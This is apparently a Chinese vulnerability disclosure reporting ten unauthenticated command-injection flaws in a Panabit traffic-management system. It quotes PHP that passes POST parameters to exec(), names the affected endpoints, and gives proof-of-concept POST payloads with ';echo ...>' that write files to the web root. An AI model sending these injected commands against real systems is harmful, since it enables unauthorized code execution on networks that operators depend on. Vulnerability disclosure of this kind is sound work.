2016-03-11: 细节已通知厂商并且等待厂商处理中 2016-03-15: 厂商已经确认,细节仅向厂商公开 2016-03-18: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息) 2016-05-09: 细节向核心白帽子及相关领域专家公开 2016-05-19: 细节向普通白帽子公开 2016-05-29: 细节向实习白帽子公开 2016-06-13: 细节向公众公开
Panabit某流量分析管理系统十处命令执行(无需登录)
全部打包了只求全rank哇官网案例:http://**.**.**.**/html/solution/success_case/2014/0903/82.html 可以看到此厂商面对的客户都是一些运营商 高校 企业 小区 网吧用户规模是非常大第一 二 三 四处:根目录下的fetionlist.php qqlist.php sinawblist.php taobaolist.php
..... 关键代码$devid = $_POST['devid'];$ipaddr = $_POST['ipaddr'];$qqnumber = $_POST['qqnumber'];$strstart = $_POST['starttime'];$strend = $_POST['endtime'];$topn = $_POST['topn'];$account = $_POST['account'];$errfile = _CHECKING_STATUS_F.'/'.$_POST['errname'];$bexport = $_POST['bexport'];$eventtype = $_POST['eventtype'];if ($bexport == 1) $filename = date("YmdHis").".xls";else if ($bexport == 2) $filename = date("YmdHis").".txt";else if ($bexport == 3) $filename = date("YmdHis").".csv";else $filename = "none";$longstart = strtotime($strstart);$longend = strtotime($strend);if ($ipaddr == "") $ipaddr = "none";else $ipaddr = ip2long($ipaddr);if ($qqnumber == "") $qqnumber = "none";if ($account == "") $account = "none";$tbstart = explode(' ', $strstart);$tbstarts = $tbstart[0]." 00:00:00";$slong = strtotime($tbstarts) - 24*3600;$elong = $longend;$tablestr = $slong."/".$elong;$k = 0;$result = array();$res = array();$link = $filename;$tablefile = php_getfetiontable($strstart, $strend);$cmd = LOGDPATH."/bin/logeye fetionlist $devid $ipaddr $qqnumber $account $longstart $longend $tablefile $bexport $filename $errfile $topn $eventtype";exec($cmd, $output, $return);
这四处关键部分大概内容都差不多 四处变量$devid $ipaddr $qqnumber $account无防护传给$cmd, $cmd直接进入exec()函数导致命令执行第五 六处:\Maintain\createappgraph.php \Maintain\createipgraph.php
$devid = $_POST['devid'];$strstart = $_POST['tmstart'];$strend = $_POST['tmend'];$topapp = $_POST['topapp'];$linkid = $_POST['linkid'];$appname = $_POST['appname'];$conn = mysql_connect(MYSQL_HOST, MYSQL_USER, MYSQL_PASS);mysql_query("set names 'utf8'");$result = mysql_query("select name from palog.axp where cname = '$appname'");if (mysql_num_rows($result) != 0){ $row = mysql_fetch_row($result); $appname = $row[0];}mysql_close();$longstart = strtotime($strstart);$longend = strtotime($strend);$tbstart = explode(' ', $strstart);$tbstarts = $tbstart[0]." 00:00:00";$slong = strtotime($tbstarts)-30*60;$elong = $longend;$tables = $slong."/".$elong;function formatdata($values, $u){ if ($values > 1024*1024*1024){ $units = 'G'; $div = 1024*1024*1024; } else if ($values > 1024*1024){ $units = 'M'; $div = 1024*1024; } else if ($values > 1024){ $units = 'K'; $div = 1024; }else { $units = 'B'; $div = 1; } if ($u == 'units') return $units; else return $div;}$labels = array();$values = array();$chart = new VerticalBarChart(1100, 300);$dataSet = new XYDataSet();exec(DOCROOT."\\bin\\logeye.exe apptop $devid $longstart $longend $tables $topapp appup $linkid", $output, $return);
Maintain此为后台目录但是没有验证权限导致未授权访问这两处关键部分大概内容都差不多三处变量$devid $linkid $topapp未过滤进入exec()函数导致命令执行第七 八处\Maintain\exportpdf.php \Maintain\exportpdf_cgi.php
$devid = $_POST['devid'];$ip = $_POST['ip'];$strstart = $_POST['tmstart'];$strend = $_POST['tmend'];$top = $_POST['top'];$errfile = _CHECKING_STATUS_F.'/'.$_POST['errname'];if ($ip == "") $ip = "**.**.**.**-**.**.**.**";$longstart = strtotime($strstart);$longend = strtotime($strend);$tbstart = explode(' ', $strstart);$tbstarts = $tbstart[0]." 00:00:00";$slong = strtotime($tbstarts)-6*30*60;$elong = $longend;$tables = $slong."/".$elong;$pdf=new PDF('P', 'mm', 'A4'); $pdf->Open();$pdf->SetMargins(5, 5, 5);$pdf->AddPage(); $pdf->SetDisplayMode('real');$pdf->AddGBFont();$pdf->SetFont('GB', 'B', 25);$pdf->SetXY(57, 70);$pdf->Cell(40,10, '流控日志管理系统报表');$pdf->Ln();$pdf->SetX(80);$pdf->Cell(40,10,'('.date('Y/m/d').')');$pdf->Ln();$pdf->Image($doc.'/img/logo.jpg', 75, 90, 50, 15);$pdf->SetFont('GB', '', 14);$pdf->Ln(50);$pdf->SetX(60);$pdf->Cell(40, 10, '创建用户:');$pdf->Cell(40, 10, $_COOKIE['c_username']);$pdf->Ln();$pdf->SetX(60);$pdf->Cell(40, 10, '流控设备编号:');if ($devid == 0) $pdf->Cell(40, 10, "所有设备");else $pdf->Cell(40,10, $devid);$pdf->Ln();$pdf->SetX(60);$pdf->Cell(40, 10, '统计时间段:');$pdf->Cell(40, 10, date('Y/m/d H:i', $longstart).'-'.date('Y/m/d H:i', $longend));$pdf->Ln();$pdf->SetX(60);$pdf->Cell(40, 10, '报表生成时间:');$pdf->Cell(40, 10, date('Y/m/d H:i'), 0,1,'L',false);$dwidth = array(10, 28, 18, 18, 18, 18, 18, 18, 18, 18, 18);$arcolors = array("#068BC5","#4EB133","#E6561C","#E6EB01","#24C8E3","#62E172","#F7EE64","#69F5C3","#ACDBFD","#C6C9CA", "#F68F67","#CDE577","#710000","#5D584B","#4572A7");$pdf->AddPage();$tablefile = php_getiptable($strstart, $strend, $devid);exec(LOGDPATH."/bin/logeye iptop $devid $ip $longstart $longend $tablefile $top total $errfile", $output, $return);$xlabels = array();$yvalues = array();foreach($output as $key=>$val){ $ds = explode(' ', $val); if ($ds[0] == "**.**.**.**") continue; array_push($xlabels, $ds[0]); array_push($yvalues, (double)$ds[1] / 1000 / 1000);}if (count($yvalues) != 0) { $graph = new Graph(1000,300,'auto'); $graph->SetScale("textlin"); $graph->img->SetMargin(50,50,10,100); $graph->title->SetFont(FF_SIMSUN, FS_NORMAL); $graph->xaxis->SetFont(FF_SIMSUN, FS_NORMAL); $graph->title->Set("(单位:M)"); $graph->ygrid->SetFill(false); $graph->xaxis->SetLabelAngle(50); $graph->xaxis->SetTickLabels($xlabels); $graph->yaxis->HideLine(false); $graph->yaxis->HideTicks(false,false); $bplot = new BarPlot($yvalues); $bplot->SetFillColor($arcolors); $graph->Add($bplot); $graph->Stroke($doc."/download/iptotal.png"); $pdf->SetFont('GB', 'B', 14); $pdf->Cell(40, 10, '用户统计'); $pdf->Ln(); $pdf->Ln(); $pdf->Image($doc.'/download/iptotal.png', $pdf->GetX(), $pdf->GetY(), 200, 80); //unlink($doc.'/download/iptotal.png'); $pdf->Ln(); $pdf->SetY(110); $pdf->SetFillColor(58,110,165); $pdf->SetTextColor(255, 255,255); $pdf->SetFont('GB', 'B', 10); $pdf->Cell(10, 14, "序号", 1, 0, 'C', true); $pdf->Cell(28, 14, "用户", 1, 0, 'C', true); $pdf->Cell(54, 7, "流量(字节)", 1, 2, 'C', true); $pdf->Cell(18, 7, "上行", 1, 0, 'C', true); $pdf->Cell(18, 7, "下行", 1, 0, 'C', true); $pdf->Cell(18, 7, "总", 1, 0, 'C', true); $pdf->SetXY($pdf->GetX(), $pdf->GetY()-7); $pdf->Cell(54, 7, "平均速率(bps)", 1, 2, 'C', true); $pdf->Cell(18, 7, "上行", 1, 0, 'C', true); $pdf->Cell(18, 7, "下行", 1, 0, 'C', true); $pdf->Cell(18, 7, "总", 1, 0, 'C', true); $pdf->SetXY($pdf->GetX(), $pdf->GetY()-7); $pdf->Cell(54, 7, "峰值速率(bps)", 1, 2, 'C', true); $pdf->Cell(18, 7, "上行", 1, 0, 'C', true); $pdf->Cell(18, 7, "下行", 1, 0, 'C', true); $pdf->Cell(18, 7, "总", 1, 0, 'C', true); $pdf->Ln(); $pdf->SetTextColor(0, 0,0); foreach($output as $key=>$val){ $ds = explode(' ', $val); if ($ds[0] == "**.**.**.**") continue; $pdf->Cell($dwidth[0], 7, $key+1, 1, 0, 'C'); $pdf->Cell($dwidth[1], 7, $ds[0], 1, 0, 'C'); $pdf->Cell($dwidth[2], 7, dataformat((double)$ds[2]), 1, 0, 'C'); $pdf->Cell($dwidth[3], 7, dataformat((double)$ds[3]), 1, 0, 'C'); $pdf->Cell($dwidth[4], 7, dataformat((double)$ds[1]), 1, 0, 'C'); $pdf->Cell($dwidth[5], 7, dataformat((double)$ds[2]*8/$ds[8]), 1, 0, 'C'); $pdf->Cell($dwidth[6], 7, dataformat((double)$ds[3]*8/$ds[8]), 1, 0, 'C'); $pdf->Cell($dwidth[7], 7, dataformat((double)$ds[1]*8/$ds[8]), 1, 0, 'C'); $pdf->Cell($dwidth[8], 7, dataformat((double)$ds[6]*8/$ds[9]), 1, 0, 'C'); $pdf->Cell($dwidth[9], 7, dataformat((double)$ds[7]*8/$ds[9]), 1, 0, 'C'); $pdf->Cell($dwidth[10], 7, dataformat(((double)$ds[6]+(double)$ds[7])*8/$ds[9]), 1, 0, 'C'); $pdf->Ln(); } $pdf->AddPage(); unset($output); unset($xlabels); unset($yvalues);}else { outputres("no", "noip"); exit;}$tablefile = php_getapptable($strstart, $strend);exec(LOGDPATH."/bin/logeye apptop $devid $longstart $longend $tablefile $top total 0 $errfile", $output, $return);
这两处关键部分大概内容都差不多变量$devid $top未过滤进入exec()函数导致命令执行第九处:\Maintain\ifadmin.php
<?php$doc = $_SERVER['DOCUMENT_ROOT'];include("$doc/common.php");$ifadmin = $_POST['ifadmin'];$ipaddr = $_POST['ipaddr'];$netmask = $_POST['netmask'];$gateway = $_POST['gateway'];$confl = array();$confl = file("/etc/rc.conf");foreach($confl as $val){ if (strstr($val, "ifconfig") !== false){ $ds = explode('=', $val); $ifconfig = $ds[0]; $ipstr = $ds[1]; $ds1 = explode('_', $ifconfig); $ori_ifadmin = $ds1[1]; $ds2 = explode(' ', $ipstr); $ori_ipaddr = $ds2[1]; $ori_netmask = trim($ds2[3], "\"\n\r"); } if (strstr($val, "defaultrouter") !== false){ $ds = explode('=', $val); $ori_gateway = trim($ds[1], "\"\n\r"); }}if ($ipaddr == $ori_ipaddr && $netmask == $ori_netmask && $gateway == $ori_gateway) outputres("yes", "操作成功");else{ $confl = array(); $confl = file("/etc/rc.conf"); $fp = fopen("/etc/rc.conf", "w"); foreach($confl as $val){ if (strstr($val, "ifconfig") !== false){ fwrite($fp, "ifconfig_$ifadmin=\"inet $ipaddr netmask $netmask\"\n"); continue; } if (strstr($val, "defaultrouter") !== false){ fwrite($fp, "defaultrouter=\"$gateway\"\n"); continue; } fwrite($fp, $val); } fclose($fp); exec("ifconfig $ifadmin $ipaddr netmask $netmask"); exec("route add default $gateway"); outputres("yes", "操作成功");}?>
变量$ifadmin $ipaddr netmask $netmask 未过滤导致命令执行第十处:\Maintain\zpool_set.php
if (!file_exists("/usr/logd/bin/install_device")){ outputres("no", "对不起,此功能在最新ISO安装的系统上有效"); exit(0);}if ($type == "add"){ $add = $_POST['add']; exec("df -h | grep mylog", $output, $ret); if ($ret == 1){ outputres("no", "zpool mylog is not exists!"); exit(0); } exec("zpool add -f mylog $add", $output, $ret); if ($ret == 1){ outputres("no", $output[0]); exit(0); } outputres("yes", "");}if ($type == "replace"){ $repla = $_POST['repla']; $new_repla = $_POST['new_repla']; exec("df -h | grep mylog", $output, $ret); if ($ret == 1){ outputres("no", "zpool mylog is not exists!"); exit(0); } exec("zpool replace -f mylog $repla $new_repla", $output, $ret); if ($ret == 1){ outputres("no", $output[0]); exit(0); } outputres("yes", "");}
变量$add $repla未过滤导致命令执行
这么多处,随便拿两处来说吧第四处证明拿一处来说**.**.**.**/qqlist.phppostdata:devid=1&ipaddr=**.**.**.**&account=xx;echo 1111>/usr/logd/www/1111.php执行完会在根目录生成一个1111.php的文件
第二处后台证明:**.**.**.**/Maintain/exportpdf.php postdata:devid=11;echo xxxxxxx>/usr/logd/www/223.php
后台其它文件也是同理会执行成功
交给厂商
危害等级:高
漏洞Rank:16
确认时间:2016-03-15 17:01
CNVD未直接复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。
暂无
$$$
@牛肉包子 我竟无言以对,咋可能
可以
@king7 求带
$$
已修正